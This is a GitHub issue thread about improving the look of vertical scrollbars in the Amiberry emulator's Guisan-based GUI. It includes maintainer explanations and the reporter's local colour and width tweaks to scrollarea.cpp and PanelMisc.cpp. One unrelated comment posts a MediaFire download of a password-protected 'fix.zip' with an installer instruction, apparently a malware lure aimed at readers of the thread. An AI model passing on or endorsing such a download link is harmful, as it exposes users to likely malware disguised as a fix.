### ISSUE TITLE
Question: Can the appearance of vertical scrollbars be improved in GUI?

### ISSUE THREAD

**Issue by giantclambake** [BlitterStudio/amiberry#1409]
Likely a lot of this goes unseen using the default GUI colours ~ I'm unsure how much of this is bounded by libguisan.

It appears that two vertical scrollbar constructs are used -- one is builtin to the GUI makeup, and always present ...for example  the Miscellaneous panel...

![ex](https://imgur.com/98HzahL.png)

Problems I see;

-- the scrollbar has a return line at top ; the bottom of the scrollbar is not defined by a return line.
-- the scrollbar has no right-hand edge ; the scrollbar should be moved/resized, so that left/right edges are visible, and scrollbar 'floats' in the visual slot.

The other scrollbars in selector panels, are created if number of entries in the list exceeds the H dimension of the selector box area...a typical example is the Configurations panel....

![ex2](https://imgur.com/x02IgdY.png)

-- the scrollbar has a return line at top ; the bottom of the scrollbar is not defined by a return line.
-- the scrollbar has no left/right edges visible ; left/right edges should be visible, and scrollbar should 'float' in the visual slot.

It's also visually hard to identify the scrollbar is there when using dark coloured theme, as the background of the scrollbar 'slot', is shaded gui_base_colour ; if it were highlighted gui_base_colour instead it'd make things more obvious...however, you achieve the same ends if the scrollbar slider is visibly defined on all 4 sides, and 'floats' in the visual scroller slot.

Thoughts?

TIA

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by midwan** [comment]
They are different objects, in fact.
The Misc panel uses a ScrollArea object, which allows the underlying Group to be scrollable.
The Config panel uses a Listbox, which has a scrollbar built-in.

The differences are in how Guisan implements these. Not perfectly, as you can see. We can tweak the sizes and positions, but the final look will still come from Guisan itself.

There have been plenty of updates in Guisan lately, and I've made a lot of modifications myself. We'll see if something improves in this area eventually, but for now, I think it's good enough as it is.

**Comment by giantclambake** [comment]
Thanks for the clues & info...gave me enough to go searching... ;)

..turns out, Listbox inherits a lot from ScrollArea, thus they share a lot in common.

Conceptually, this is a ramification of adding GUI theming ...that is, Guisan lends itself towards a drop-shadow widget style, and likely only ever envisaged the base GUI colours would be 'fixed' (not user changeable) ~ with a dark theme, drop-shadow doesn't work so well (like walking on a moonless night ;)

After a short glimpse, I found drawVMarker .... in external/libguisan/src/widgets/scrollarea.cpp @ line 777

Changed to: ` Color shadowColor = faceColor + 0x303030;`

...with  my usual dark theme;

![ex](https://imgur.com/IWFAu1t.png)

...with default GUI colours...

![ex2](https://imgur.com/8t9l3bA.png)

Note: the right edge of the Miscellaneous scrollbar (background image) looks goofy, but this seems to be due to the fact it's width is being 'pinched'...ie; look at the up/down arrow widgets, they are not square symmetrical with arrows centered, they look justified left, with the right side squashed...I think if that were fixed, it'd look normal.

Perhaps the alpha blend value could be lowered as well...

I think it looks better like this IMHO (especially with a dark theme), but seeing as it's such a simple edit I can apply it locally for better scrollbar visibility. If the items to the right of the Vscrollbar in the Miscellaneous panel could be moved (and allow the Vscrollbar to be symmetrical), it would improve the look there anyway...(perhaps the textbox for options on the right could be shortened, based upon the fact the stringboxes only have to cater for a small number of chars?)

All good ~ found my answer in the shadows B)

**Comment by giantclambake** [comment]
`Color shadowColor = faceColor + 0x202020; `  is the charm .. ;)

**Comment by giantclambake** [comment]
....looking further. the scroller in Miscellaneous panel....it is actually wrong here....

![ex](https://imgur.com/WkXc7Gc.png)

....I got it down to...

![ex2](https://imgur.com/NxUjC8p.png)

....removing 1 pixel width from the above, results in...

![ex3](https://imgur.com/mDu1QCQ.png)

This is in... PanelMisc.cpp @ line 675   ..  

`scrlMisc->setWidth(category.panel->getWidth() - (category.panel->getWidth() / 3) - 25);`

Changing the getWidth() value to -28 ... less 1 pixel to -27 as above

The value of -27 pixels is more correct ~ it's guisan's intent to draw that darker vertical line, to achieve separation between the 2 elements...ie; with -28 pixels, that distinction is lost.....but it **_looks_** more balanced, just because I haven't found any equivalent way to put a 1 pixel wide vertical line between the scrollbar button and the right edge...

...see what happens if I fix the scrollbar button highlight/shadow a bit more...
